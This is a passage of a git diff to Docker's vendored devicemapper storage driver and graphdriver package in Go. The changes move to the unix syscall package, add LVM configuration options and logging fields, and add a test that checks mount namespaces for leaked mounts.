syscall.MNT_DETACH) + unix.Unmount(path, unix.MNT_DETACH) devices.deactivateDevice(info) return err } @@ -2388,8 +2397,10 @@ func (devices *DeviceSet) MountDevice(hash, path, mountLabel string) error { // UnmountDevice unmounts the device and removes it from hash. func (devices *DeviceSet) UnmountDevice(hash, mountPath string) error { - logrus.Debugf("devmapper: UnmountDevice START(hash=%s)", hash) - defer logrus.Debugf("devmapper: UnmountDevice END(hash=%s)", hash) + logger := logrus.WithField("storage-driver", "devicemapper") + + logger.Debugf("UnmountDevice START(hash=%s)", hash) + defer logger.Debugf("UnmountDevice END(hash=%s)", hash) info, err := devices.lookupDeviceWithLock(hash) if err != nil { @@ -2402,17 +2413,25 @@ func (devices *DeviceSet) UnmountDevice(hash, mountPath string) error { devices.Lock() defer devices.Unlock() - logrus.Debugf("devmapper: Unmount(%s)", mountPath) - if err := syscall.Unmount(mountPath, syscall.MNT_DETACH); err != nil { + logger.Debugf("Unmount(%s)", mountPath) + if err := unix.Unmount(mountPath, unix.MNT_DETACH); err != nil { return err } - logrus.Debug("devmapper: Unmount done") + logger.Debug("Unmount done") - if err := devices.deactivateDevice(info); err != nil { - return err + // Remove the mountpoint here. Removing the mountpoint (in newer kernels) + // will cause all other instances of this mount in other mount namespaces + // to be killed (this is an anti-DoS measure that is necessary for things + // like devicemapper). This is necessary to avoid cases where a libdm mount + // that is present in another namespace will cause subsequent RemoveDevice + // operations to fail. We ignore any errors here because this may fail on + // older kernels which don't have + // torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe applied. 
+ if err := os.Remove(mountPath); err != nil { + logger.Debugf("error doing a remove on unmounted device %s: %v", mountPath, err) } - return nil + return devices.deactivateDevice(info) } // HasDevice returns true if the device metadata exists. @@ -2504,9 +2523,9 @@ func (devices *DeviceSet) MetadataDevicePath() string { } func (devices *DeviceSet) getUnderlyingAvailableSpace(loopFile string) (uint64, error) { - buf := new(syscall.Statfs_t) - if err := syscall.Statfs(loopFile, buf); err != nil { - logrus.Warnf("devmapper: Couldn't stat loopfile filesystem %v: %v", loopFile, err) + buf := new(unix.Statfs_t) + if err := unix.Statfs(loopFile, buf); err != nil { + logrus.WithField("storage-driver", "devicemapper").Warnf("Couldn't stat loopfile filesystem %v: %v", loopFile, err) return 0, err } return buf.Bfree * uint64(buf.Bsize), nil @@ -2516,7 +2535,7 @@ func (devices *DeviceSet) isRealFile(loopFile string) (bool, error) { if loopFile != "" { fi, err := os.Stat(loopFile) if err != nil { - logrus.Warnf("devmapper: Couldn't stat loopfile %v: %v", loopFile, err) + logrus.WithField("storage-driver", "devicemapper").Warnf("Couldn't stat loopfile %v: %v", loopFile, err) return false, err } return fi.Mode().IsRegular(), nil @@ -2614,7 +2633,24 @@ func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps [ minFreeSpacePercent: defaultMinFreeSpacePercent, } + version, err := devicemapper.GetDriverVersion() + if err != nil { + // Can't even get driver version, assume not supported + return nil, graphdriver.ErrNotSupported + } + + if err := determineDriverCapabilities(version); err != nil { + return nil, graphdriver.ErrNotSupported + } + + if driverDeferredRemovalSupport && devicemapper.LibraryDeferredRemovalSupport { + // enable deferred stuff by default + enableDeferredDeletion = true + enableDeferredRemoval = true + } + foundBlkDiscard := false + var lvmSetupConfig directLVMConfig for _, option := range options { key, val, err := 
parsers.ParseKeyValueOpt(option) if err != nil { @@ -2643,7 +2679,7 @@ func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps [ devices.metaDataLoopbackSize = size case "dm.fs": if val != "ext4" && val != "xfs" { - return nil, fmt.Errorf("devmapper: Unsupported filesystem %s\n", val) + return nil, fmt.Errorf("devmapper: Unsupported filesystem %s", val) } devices.filesystem = val case "dm.mkfsarg": @@ -2709,11 +2745,72 @@ func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps [ return nil, err } devices.xfsNospaceRetries = val + case "dm.directlvm_device": + lvmSetupConfig.Device = val + case "dm.directlvm_device_force": + lvmSetupConfigForce, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + case "dm.thinp_percent": + per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32) + if err != nil { + return nil, errors.Wrapf(err, "could not parse `dm.thinp_percent=%s`", val) + } + if per >= 100 { + return nil, errors.New("dm.thinp_percent must be greater than 0 and less than 100") + } + lvmSetupConfig.ThinpPercent = per + case "dm.thinp_metapercent": + per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32) + if err != nil { + return nil, errors.Wrapf(err, "could not parse `dm.thinp_metapercent=%s`", val) + } + if per >= 100 { + return nil, errors.New("dm.thinp_metapercent must be greater than 0 and less than 100") + } + lvmSetupConfig.ThinpMetaPercent = per + case "dm.thinp_autoextend_percent": + per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32) + if err != nil { + return nil, errors.Wrapf(err, "could not parse `dm.thinp_autoextend_percent=%s`", val) + } + if per > 100 { + return nil, errors.New("dm.thinp_autoextend_percent must be greater than 0 and less than 100") + } + lvmSetupConfig.AutoExtendPercent = per + case "dm.thinp_autoextend_threshold": + per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32) + if err != nil { + return nil, 
errors.Wrapf(err, "could not parse `dm.thinp_autoextend_threshold=%s`", val) + } + if per > 100 { + return nil, errors.New("dm.thinp_autoextend_threshold must be greater than 0 and less than 100") + } + lvmSetupConfig.AutoExtendThreshold = per + case "dm.libdm_log_level": + level, err := strconv.ParseInt(val, 10, 32) + if err != nil { + return nil, errors.Wrapf(err, "could not parse `dm.libdm_log_level=%s`", val) + } + if level < devicemapper.LogLevelFatal || level > devicemapper.LogLevelDebug { + return nil, errors.Errorf("dm.libdm_log_level must be in range [%d,%d]", devicemapper.LogLevelFatal, devicemapper.LogLevelDebug) + } + // Register a new logging callback with the specified level. + devicemapper.LogInit(devicemapper.DefaultLogger{ + Level: int(level), + }) default: - return nil, fmt.Errorf("devmapper: Unknown option %s\n", key) + return nil, fmt.Errorf("devmapper: Unknown option %s", key) } } + if err := validateLVMConfig(lvmSetupConfig); err != nil { + return nil, err + } + + devices.lvmSetupConfig = lvmSetupConfig + // By default, don't do blk discard hack on raw devices, its rarely useful and is expensive if !foundBlkDiscard && (devices.dataDevice != "" || devices.thinPoolDevice != "") { devices.doBlkDiscard = false diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go index 9ab3e4f864..98ff5cf124 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go @@ -1,4 +1,4 @@ -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" // Definition of struct dm_task and sub structures (from lvm2) // diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go index 
5c2abcefcb..bda907a5d6 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go @@ -1,27 +1,72 @@ // +build linux -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" import ( "fmt" + "os" + "os/exec" + "syscall" "testing" "time" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/daemon/graphdriver/graphtest" + "github.com/docker/docker/pkg/parsers/kernel" + "golang.org/x/sys/unix" ) func init() { - // Reduce the size the the base fs and loopback for the tests + // Reduce the size of the base fs and loopback for the tests defaultDataLoopbackSize = 300 * 1024 * 1024 defaultMetaDataLoopbackSize = 200 * 1024 * 1024 defaultBaseFsSize = 300 * 1024 * 1024 defaultUdevSyncOverride = true - if err := graphtest.InitLoopbacks(); err != nil { + if err := initLoopbacks(); err != nil { panic(err) } } +// initLoopbacks ensures that the loopback devices are properly created within +// the system running the device mapper tests. +func initLoopbacks() error { + statT, err := getBaseLoopStats() + if err != nil { + return err + } + // create at least 8 loopback files, ya, that is a good number + for i := 0; i < 8; i++ { + loopPath := fmt.Sprintf("/dev/loop%d", i) + // only create new loopback files if they don't exist + if _, err := os.Stat(loopPath); err != nil { + if mkerr := syscall.Mknod(loopPath, + uint32(statT.Mode|syscall.S_IFBLK), int((7<<8)|(i&0xff)|((i&0xfff00)<<12))); mkerr != nil { + return mkerr + } + os.Chown(loopPath, int(statT.Uid), int(statT.Gid)) + } + } + return nil +} + +// getBaseLoopStats inspects /dev/loop0 to collect uid,gid, and mode for the +// loop0 device on the system. 
If it does not exist we assume 0,0,0660 for the +// stat data +func getBaseLoopStats() (*syscall.Stat_t, error) { + loop0, err := os.Stat("/dev/loop0") + if err != nil { + if os.IsNotExist(err) { + return &syscall.Stat_t{ + Uid: 0, + Gid: 0, + Mode: 0660, + }, nil + } + return nil, err + } + return loop0.Sys().(*syscall.Stat_t), nil +} + // This avoids creating a new driver for each test if all tests are run // Make sure to put new tests between TestDevmapperSetup and TestDevmapperTeardown func TestDevmapperSetup(t *testing.T) { @@ -59,7 +104,7 @@ func testChangeLoopBackSize(t *testing.T, delta, expectDataSize, expectMetaDataS defer graphtest.PutDriver(t) // make sure data or metadata loopback size are the default size if s := driver.DeviceSet.Status(); s.Data.Total != uint64(defaultDataLoopbackSize) || s.Metadata.Total != uint64(defaultMetaDataLoopbackSize) { - t.Fatalf("data or metadata loop back size is incorrect") + t.Fatal("data or metadata loop back size is incorrect") } if err := driver.Cleanup(); err != nil { t.Fatal(err) @@ -74,7 +119,7 @@ func testChangeLoopBackSize(t *testing.T, delta, expectDataSize, expectMetaDataS } driver = d.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) if s := driver.DeviceSet.Status(); s.Data.Total != uint64(expectDataSize) || s.Metadata.Total != uint64(expectMetaDataSize) { - t.Fatalf("data or metadata loop back size is incorrect") + t.Fatal("data or metadata loop back size is incorrect") } if err := driver.Cleanup(); err != nil { t.Fatal(err) @@ -104,7 +149,57 @@ func TestDevmapperLockReleasedDeviceDeletion(t *testing.T) { // function return and we are deadlocked. Release lock // here so that cleanup could succeed and fail the test. driver.DeviceSet.Unlock() - t.Fatalf("Could not acquire devices lock after call to cleanupDeletedDevices()") + t.Fatal("Could not acquire devices lock after call to cleanupDeletedDevices()") case <-doneChan: } } + +// Ensure that mounts aren't leakedriver. 
It's non-trivial for us to test the full +// reproducer of #34573 in a unit test, but we can at least make sure that a +// simple command run in a new namespace doesn't break things horribly. +func TestDevmapperMountLeaks(t *testing.T) { + if !kernel.CheckKernelVersion(3, 18, 0) { + t.Skipf("kernel version <3.18.0 and so is missing torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe.") + } + + driver := graphtest.GetDriver(t, "devicemapper", "dm.use_deferred_removal=false", "dm.use_deferred_deletion=false").(*graphtest.Driver).Driver.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) + defer graphtest.PutDriver(t) + + // We need to create a new (dummy) device. + if err := driver.Create("some-layer", "", nil); err != nil { + t.Fatalf("setting up some-layer: %v", err) + } + + // Mount the device. + _, err := driver.Get("some-layer", "") + if err != nil { + t.Fatalf("mounting some-layer: %v", err) + } + + // Create a new subprocess which will inherit our mountpoint, then + // intentionally leak it and stick around. We can't do this entirely within + // Go because forking and namespaces in Go are really not handled well at + // all. + cmd := exec.Cmd{ + Path: "/bin/sh", + Args: []string{ + "/bin/sh", "-c", + "mount --make-rprivate / && sleep 1000s", + }, + SysProcAttr: &syscall.SysProcAttr{ + Unshareflags: syscall.CLONE_NEWNS, + }, + } + if err := cmd.Start(); err != nil { + t.Fatalf("starting sub-command: %v", err) + } + defer func() { + unix.Kill(cmd.Process.Pid, unix.SIGKILL) + cmd.Wait() + }() + + // Now try to "drop" the device. 
+ if err := driver.Put("some-layer"); err != nil { + t.Fatalf("unmounting some-layer: %v", err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go index 7cf422ce6a..df883de31d 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go @@ -1,6 +1,6 @@ // +build linux -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" import ( "fmt" @@ -9,13 +9,16 @@ import ( "path" "strconv" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/devicemapper" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" "github.com/docker/docker/pkg/mount" "github.com/docker/go-units" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func init() { @@ -29,6 +32,7 @@ type Driver struct { uidMaps []idtools.IDMap gidMaps []idtools.IDMap ctr *graphdriver.RefCounter + locker *locker.Locker } // Init creates a driver with the given home and the set of options. 
@@ -38,16 +42,13 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap return nil, err } - if err := mount.MakePrivate(home); err != nil { - return nil, err - } - d := &Driver{ DeviceSet: deviceSet, home: home, uidMaps: uidMaps, gidMaps: gidMaps, ctr: graphdriver.NewRefCounter(graphdriver.NewDefaultChecker()), + locker: locker.New(), } return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil @@ -65,22 +66,17 @@ func (d *Driver) Status() [][2]string { status := [][2]string{ {"Pool Name", s.PoolName}, - {"Pool Blocksize", fmt.Sprintf("%s", units.HumanSize(float64(s.SectorSize)))}, - {"Base Device Size", fmt.Sprintf("%s", units.HumanSize(float64(s.BaseDeviceSize)))}, + {"Pool Blocksize", units.HumanSize(float64(s.SectorSize))}, + {"Base Device Size", units.HumanSize(float64(s.BaseDeviceSize))}, {"Backing Filesystem", s.BaseDeviceFS}, - {"Data file", s.DataFile}, - {"Metadata file", s.MetadataFile}, - {"Data Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Used)))}, - {"Data Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Total)))}, - {"Data Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Available)))}, - {"Metadata Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Used)))}, - {"Metadata Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Total)))}, - {"Metadata Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Available)))}, - {"Thin Pool Minimum Free Space", fmt.Sprintf("%s", units.HumanSize(float64(s.MinFreeSpace)))}, {"Udev Sync Supported", fmt.Sprintf("%v", s.UdevSyncSupported)}, - {"Deferred Removal Enabled", fmt.Sprintf("%v", s.DeferredRemoveEnabled)}, - {"Deferred Deletion Enabled", fmt.Sprintf("%v", s.DeferredDeleteEnabled)}, - {"Deferred Deleted Device Count", fmt.Sprintf("%v", s.DeferredDeletedDeviceCount)}, + } + + if len(s.DataFile) > 0 { + status = append(status, [2]string{"Data file", s.DataFile}) + } + if 
len(s.MetadataFile) > 0 { + status = append(status, [2]string{"Metadata file", s.MetadataFile}) } if len(s.DataLoopback) > 0 { status = append(status, [2]string{"Data loop file", s.DataLoopback}) @@ -88,6 +84,20 @@ func (d *Driver) Status() [][2]string { if len(s.MetadataLoopback) > 0 { status = append(status, [2]string{"Metadata loop file", s.MetadataLoopback}) } + + status = append(status, [][2]string{ + {"Data Space Used", units.HumanSize(float64(s.Data.Used))}, + {"Data Space Total", units.HumanSize(float64(s.Data.Total))}, + {"Data Space Available", units.HumanSize(float64(s.Data.Available))}, + {"Metadata Space Used", units.HumanSize(float64(s.Metadata.Used))}, + {"Metadata Space Total", units.HumanSize(float64(s.Metadata.Total))}, + {"Metadata Space Available", units.HumanSize(float64(s.Metadata.Available))}, + {"Thin Pool Minimum Free Space", units.HumanSize(float64(s.MinFreeSpace))}, + {"Deferred Removal Enabled", fmt.Sprintf("%v", s.DeferredRemoveEnabled)}, + {"Deferred Deletion Enabled", fmt.Sprintf("%v", s.DeferredDeleteEnabled)}, + {"Deferred Deleted Device Count", fmt.Sprintf("%v", s.DeferredDeletedDeviceCount)}, + }...) + if vStr, err := devicemapper.GetLibraryVersion(); err == nil { status = append(status, [2]string{"Library Version", vStr}) } @@ -112,12 +122,18 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) { // Cleanup unmounts a device. 
func (d *Driver) Cleanup() error { err := d.DeviceSet.Shutdown(d.home) + umountErr := mount.RecursiveUnmount(d.home) - if err2 := mount.Unmount(d.home); err == nil { - err = err2 + // in case we have two errors, prefer the one from Shutdown() + if err != nil { + return err } - return err + if umountErr != nil { + return errors.Wrapf(umountErr, "error unmounting %s", d.home) + } + + return nil } // CreateReadWrite creates a layer that is writable for use as a container @@ -132,16 +148,13 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { if opts != nil { storageOpt = opts.StorageOpt } - - if err := d.DeviceSet.AddDevice(id, parent, storageOpt); err != nil { - return err - } - - return nil + return d.DeviceSet.AddDevice(id, parent, storageOpt) } -// Remove removes a device with a given id, unmounts the filesystem. +// Remove removes a device with a given id, unmounts the filesystem, and removes the mount point. func (d *Driver) Remove(id string) error { + d.locker.Lock(id) + defer d.locker.Unlock(id) if !d.DeviceSet.HasDevice(id) { // Consider removing a non-existing device a no-op // This is useful to be able to progress on container removal @@ -151,51 +164,61 @@ func (d *Driver) Remove(id string) error { // This assumes the device has been properly Get/Put:ed and thus is unmounted if err := d.DeviceSet.DeleteDevice(id, false); err != nil { - return err + return fmt.Errorf("failed to remove device %s: %v", id, err) } + // Most probably the mount point is already removed on Put() + // (see DeviceSet.UnmountDevice()), but just in case it was not + // let's try to remove it here as well, ignoring errors as + // an older kernel can return EBUSY if e.g. the mount was leaked + // to other mount namespaces. A failure to remove the container's + // mount point is not important and should not be treated + // as a failure to remove the container. 
mp := path.Join(d.home, "mnt", id) - if err := os.RemoveAll(mp); err != nil && !os.IsNotExist(err) { - return err + err := unix.Rmdir(mp) + if err != nil && !os.IsNotExist(err) { + logrus.WithField("storage-driver", "devicemapper").Warnf("unable to remove mount point %q: %s", mp, err) } return nil } // Get mounts a device with given id into the root filesystem -func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { + d.locker.Lock(id) + defer d.locker.Unlock(id) mp := path.Join(d.home, "mnt", id) rootFs := path.Join(mp, "rootfs") if count := d.ctr.Increment(mp); count > 1 { - return rootFs, nil + return containerfs.NewLocalContainerFS(rootFs), nil } uid, gid, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) if err != nil { d.ctr.Decrement(mp) - return "", err + return nil, err } // Create the target directories if they don't exist - if err := idtools.MkdirAllAs(path.Join(d.home, "mnt"), 0755, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAllAndChown(path.Join(d.home, "mnt"), 0755, idtools.IDPair{UID: uid, GID: gid}); err != nil { d.ctr.Decrement(mp) - return "", err + return nil, err } - if err := idtools.MkdirAs(mp, 0755, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAndChown(mp, 0755, idtools.IDPair{UID: uid, GID: gid}); err != nil && !os.IsExist(err) { d.ctr.Decrement(mp) - return "", err + return nil, err } // Mount the device if err := d.DeviceSet.MountDevice(id, mp, mountLabel); err != nil { d.ctr.Decrement(mp) - return "", err + return nil, err } - if err := idtools.MkdirAllAs(rootFs, 0755, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAllAndChown(rootFs, 0755, idtools.IDPair{UID: uid, GID: gid}); err != nil { d.ctr.Decrement(mp) d.DeviceSet.UnmountDevice(id, mp) - return "", err + return nil, err } idFile := path.Join(mp, "id") @@ -205,23 +228,27 @@ func (d *Driver) Get(id, mountLabel string) (string, 
error) { if err := ioutil.WriteFile(idFile, []byte(id), 0600); err != nil { d.ctr.Decrement(mp) d.DeviceSet.UnmountDevice(id, mp) - return "", err + return nil, err } } - return rootFs, nil + return containerfs.NewLocalContainerFS(rootFs), nil } // Put unmounts a device and removes it. func (d *Driver) Put(id string) error { + d.locker.Lock(id) + defer d.locker.Unlock(id) mp := path.Join(d.home, "mnt", id) if count := d.ctr.Decrement(mp); count > 0 { return nil } + err := d.DeviceSet.UnmountDevice(id, mp) if err != nil { - logrus.Errorf("devmapper: Error unmounting device %s: %s", id, err) + logrus.WithField("storage-driver", "devicemapper").Errorf("Error unmounting device %s: %v", id, err) } + return err } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go index cca1fe1b38..78d05b0792 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go @@ -1,36 +1,13 @@ // +build linux -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" import ( "bytes" "fmt" "os" - "path/filepath" - "syscall" ) -// FIXME: this is copy-pasted from the aufs driver. -// It should be moved into the core. - -// Mounted returns true if a mount point exists. 
-func Mounted(mountpoint string) (bool, error) { - mntpoint, err := os.Stat(mountpoint) - if err != nil { - if os.IsNotExist(err) { - return false, nil - } - return false, err - } - parent, err := os.Stat(filepath.Join(mountpoint, "..")) - if err != nil { - return false, err - } - mntpointSt := mntpoint.Sys().(*syscall.Stat_t) - parentSt := parent.Sys().(*syscall.Stat_t) - return mntpointSt.Dev != parentSt.Dev, nil -} - type probeData struct { fsName string magic string diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go index f0bce562b7..a9e1957393 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go @@ -1,17 +1,17 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( - "errors" "fmt" "io" "os" "path/filepath" "strings" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" "github.com/vbatts/tar-split/tar/storage" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/plugingetter" ) @@ -27,13 +27,6 @@ const ( var ( // All registered drivers drivers map[string]InitFunc - - // ErrNotSupported returned when driver is not supported. - ErrNotSupported = errors.New("driver not supported") - // ErrPrerequisites retuned when driver does not meet prerequisites. - ErrPrerequisites = errors.New("prerequisites for driver not satisfied (wrong filesystem?)") - // ErrIncompatibleFS returned when file system is not supported. - ErrIncompatibleFS = fmt.Errorf("backing file system is unsupported for this graph driver") ) //CreateOpts contains optional arguments for Create() and CreateReadWrite() @@ -68,7 +61,7 @@ type ProtoDriver interface { // Get returns the mountpoint for the layered filesystem referred // to by this id. 
You can optionally specify a mountLabel or "". // Returns the absolute path to the mounted layered filesystem. - Get(id, mountLabel string) (dir string, err error) + Get(id, mountLabel string) (fs containerfs.ContainerFS, err error) // Put releases the system resources for the specified id, // e.g, unmounting layered filesystem. Put(id string) error @@ -112,6 +105,23 @@ type Driver interface { DiffDriver } +// Capabilities defines a list of capabilities a driver may implement. +// These capabilities are not required; however, they do determine how a +// graphdriver can be used. +type Capabilities struct { + // Flags that this driver is capable of reproducing exactly equivalent + // diffs for read-only layers. If set, clients can rely on the driver + // for consistent tar streams, and avoid extra processing to account + // for potential differences (eg: the layer store's use of tar-split). + ReproducesExactDiffs bool +} + +// CapabilityDriver is the interface for layered file system drivers that +// can report on their Capabilities. +type CapabilityDriver interface { + Capabilities() Capabilities +} + // DiffGetterDriver is the interface for layered file system drivers that // provide a specialized function for getting file contents for tar-split. type DiffGetterDriver interface { @@ -190,7 +200,9 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err // Guess for prior driver driversMap := scanPriorDrivers(config.Root) - for _, name := range priority { + list := strings.Split(priority, ",") + logrus.Debugf("[graphdriver] priority list: %v", list) + for _, name := range list { if name == "vfs" { // don't use vfs even if there is state present. 
continue @@ -225,10 +237,10 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err } // Check for priority drivers first - for _, name := range priority { + for _, name := range list { driver, err := getBuiltinDriver(name, config.Root, config.DriverOptions, config.UIDMaps, config.GIDMaps) if err != nil { - if isDriverNotSupported(err) { + if IsDriverNotSupported(err) { continue } return nil, err @@ -240,7 +252,7 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err for name, initFunc := range drivers { driver, err := initFunc(filepath.Join(config.Root, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) if err != nil { - if isDriverNotSupported(err) { + if IsDriverNotSupported(err) { continue } return nil, err @@ -250,12 +262,6 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err return nil, fmt.Errorf("No supported storage backend found") } -// isDriverNotSupported returns true if the error initializing -// the graph driver is a non-supported error. -func isDriverNotSupported(err error) bool { - return err == ErrNotSupported || err == ErrPrerequisites || err == ErrIncompatibleFS -} - // scanPriorDrivers returns an un-ordered scan of directories of prior storage drivers func scanPriorDrivers(root string) map[string]bool { driversMap := make(map[string]bool) @@ -263,8 +269,39 @@ func scanPriorDrivers(root string) map[string]bool { for driver := range drivers { p := filepath.Join(root, driver) if _, err := os.Stat(p); err == nil && driver != "vfs" { - driversMap[driver] = true + if !isEmptyDir(p) { + driversMap[driver] = true + } } } return driversMap } + +// IsInitialized checks if the driver's home-directory exists and is non-empty. 
+func IsInitialized(driverHome string) bool { + _, err := os.Stat(driverHome) + if os.IsNotExist(err) { + return false + } + if err != nil { + logrus.Warnf("graphdriver.IsInitialized: stat failed: %v", err) + } + return !isEmptyDir(driverHome) +} + +// isEmptyDir checks if a directory is empty. It is used to check if prior +// storage-driver directories exist. If an error occurs, it also assumes the +// directory is not empty (which preserves the behavior _before_ this check +// was added) +func isEmptyDir(name string) bool { + f, err := os.Open(name) + if err != nil { + return false + } + defer f.Close() + + if _, err = f.Readdirnames(1); err == io.EOF { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go index 2891a84f3a..cd83c4e21a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go @@ -1,17 +1,19 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" -import "syscall" +import ( + "syscall" + + "golang.org/x/sys/unix" +) var ( - // Slice of drivers that should be used in an order - priority = []string{ - "zfs", - } + // List of drivers that should be used in an order + priority = "zfs" ) // Mounted checks if the given path is mounted as the fs type func Mounted(fsType FsMagic, mountPath string) (bool, error) { - var buf syscall.Statfs_t + var buf unix.Statfs_t if err := syscall.Statfs(mountPath, &buf); err != nil { return false, err } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go index 5c8d0e2301..61c6b24a9c 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go @@ -1,12 +1,8 @@ -// 
+build linux - -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( - "path/filepath" - "syscall" - "github.com/docker/docker/pkg/mount" + "golang.org/x/sys/unix" ) const ( @@ -51,22 +47,15 @@ const ( ) var ( - // Slice of drivers that should be used in an order - priority = []string{ - "aufs", - "btrfs", - "zfs", - "overlay2", - "overlay", - "devicemapper", - "vfs", - } + // List of drivers that should be used in an order + priority = "btrfs,zfs,overlay2,aufs,overlay,devicemapper,vfs" // FsNames maps filesystem id to name of the filesystem. FsNames = map[FsMagic]string{ FsMagicAufs: "aufs", FsMagicBtrfs: "btrfs", FsMagicCramfs: "cramfs", + FsMagicEcryptfs: "ecryptfs", FsMagicExtfs: "extfs", FsMagicF2fs: "f2fs", FsMagicGPFS: "gpfs", @@ -88,14 +77,14 @@ var ( // GetFSMagic returns the filesystem id given the path. func GetFSMagic(rootpath string) (FsMagic, error) { - var buf syscall.Statfs_t - if err := syscall.Statfs(filepath.Dir(rootpath), &buf); err != nil { + var buf unix.Statfs_t + if err := unix.Statfs(rootpath, &buf); err != nil { return 0, err } return FsMagic(buf.Type), nil } -// NewFsChecker returns a checker configured for the provied FsMagic +// NewFsChecker returns a checker configured for the provided FsMagic func NewFsChecker(t FsMagic) Checker { return &fsChecker{ t: t, @@ -127,8 +116,8 @@ func (c *defaultChecker) IsMounted(path string) bool { // Mounted checks if the given path is mounted as the fs type func Mounted(fsType FsMagic, mountPath string) (bool, error) { - var buf syscall.Statfs_t - if err := syscall.Statfs(mountPath, &buf); err != nil { + var buf unix.Statfs_t + if err := unix.Statfs(mountPath, &buf); err != nil { return false, err } return FsMagic(buf.Type) == fsType, nil diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go deleted file mode 100644 index 7daf01c32d..0000000000 --- 
